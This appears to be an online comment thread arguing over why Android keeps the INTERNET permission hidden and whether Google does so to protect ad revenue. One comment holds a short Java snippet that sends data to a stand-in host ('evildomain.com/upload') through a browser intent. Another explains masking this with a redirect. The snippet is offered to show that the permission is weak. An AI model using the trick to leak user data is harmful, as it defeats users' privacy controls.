The internet permission has nothing to do with ads? It's a hidden permission because:
1) Internet connection is so ubiquitous as to just be noise if displayed
2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
That doesn't make it any less useful.
> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?
The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE);
Intent i = new Intent(Intent.ACTION_VIEW, uri);
startActivity(i);
I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.
Because it is obvious. Just open a web browser.
More details here: https://old.reddit.com/r/androiddev/comments/ci4tdq/were_on_...
Hey we were already on board with this, you don't have to convince us.
You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?
This permission has existed for longer than runtime permissions. You have never been able to revoke it, it was just something you agreed to when you installed the app or you didn't install the app.
It was "removed" in that era because if every app requests the same permission, then nobody cares about it anymore. When every app asks for the same thing, users stop paying attention to it. So no, it had fuck all to do with ads because that was never a thing in the first place. And ad blocking doesn't require this permission, either.
> Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
You can still use it for this. Apps are required to declare the permission still, it's listed on the Play Store under the "permissions" section. Similarly the OS reports the same thing. Presumably F-droid or whatever else also has a list of permissions before you install, and it'll be listed there.
Although Google's own Calculator app requires Internet permission. Take that for what's it worth.
That's also why there's a warning before installing really old apps, they may run with extra permissions.
So rather than just dismissing the argument via insulting language, can you provide a reasonable alternative explanation for why this setting isn't exposed to the user?
and isn't it immediately apparent that the app is leaking data if your calculator is popping a webview?
That's not even a little bit true? There's a ton of 'normal' permissions, almost none of which are user-overrideable. Like, say, android.permission.VIBRATE. Or android.permission.GET_PACKAGE_SIZE. Android has an obscene number of permissions ( https://developer.android.com/reference/android/Manifest.per... ) and almost none of them have a UI to control them nor any ability to be rejected
> It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
How, exactly? How does Google benefit from random 3p apps having Internet access? And remember, Google has play services on every device to proxy anything it needs/wants.
And I did provide 2 reasons why that's the case for Internet specifically, neither of which were even attempted to be refuted in this comment chain
Some chinese skins do offer the ability to revoke internet access for apps. I wonder why the western ones don't?
Yes, this is a little suspicious. But you just have the evil page redirect to google.com or something benign. To the user it looks like "huh, chrome just opened on its own."
Calculator.apk wants to open the web page https://eviltracker.example.com. Allow this time? Allow for 24 hours? Allow and don't ask me again?
I pretty solidly refuted your first reason (internet connection is ubiquitious, apps don't need it). I pointed out that there are whole categories of apps that don't need a network connection. You never bothered to refute my argument and are now claiming that I didn't address that point. You claim it is a 'ubiquitous' permission, but haven't said why a level sensor app that just reads the MEMS gyro sensor would need a network connection at all. So that's point 1 sorted, which I already addressed and you are pretending wasn't refuted.
Point 2 was "2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar"
I never addressed this, because it seemed extraneous to the discussion. This data exfiltration is purely a hypothetical at this point, since apps can always rely on a network connection. Sure, if the network setting was exposed to the user and was able to be toggled, there might be ways to bypass that. But that is hypothetical, and relies on hypothetical security loopholes. No apps are currently doing this, since apps can't have their network permissions toggled. The possibility of potentially bypassing the system network permission toggle doesn't seem germane, since it's a hypothetical. To use your words, it's a 'whack-ass conspiracy theory' and not a germane concern.
You've resorted to ad-hominem by insinuating that my viewpoint as a conspiracy theory and haven't even attempted to address my point that there are whole categories of apps that don't need network connections. You also are trying to claim that I haven't addressed points you made, while ignoring my argument that rebutted those claims. I'm sorry, but since you want to engage in this way,why are you so addicted to the taste of Google boot leather? Why are you trying to say that Google doesn't want to protect its ad network? Android apps using Google adsense to serve ads to users clearly benefits them, I don't even see why this is controversial.
Doing this for all apps would be wild. Doing this just for those that don't request the internet permission just encourages more apps to request it (it is basically universally used anyway). "Huh, why does my calculator need internet" has never actually been effective at helping people avoid malware at any meaningful scale.
I mean, would you chop off your own foot? No? Then we should all be in agreeance. Google is definitely forcing network permission for every app to maximize their ad revenue.
No it wouldn't, not at all.
90% of apps on your phone do not need to be apps. Facebook does not need to be an app. Instagram does not need to be an app.
This is a sober reminder that apps are executables code that is running on your phone with very little sandbox. Its not like a web browser.
We do not need to execute compiled binaries that are closed source to buy parking that one time. No, no we don't.
Why do we? Because as I've said - such apps are much more powerful than the web browser and can therefore be used as spyware or keyloggers. Most apps on Android, including most Google apps, can be regarded as spyware.
Companies don't want to give up their de facto malware they've built up, and now users are trained to just install whatever the fuck on their phone.
We have given software 1000x more permission than it needs to do want it does. And now, we sit back and complain about malware.
This starts with Google, this starts with Meta, this starts with big tech. They directly caused all this malware by forcing users into downloading executables so they can exfiltrate your key presses.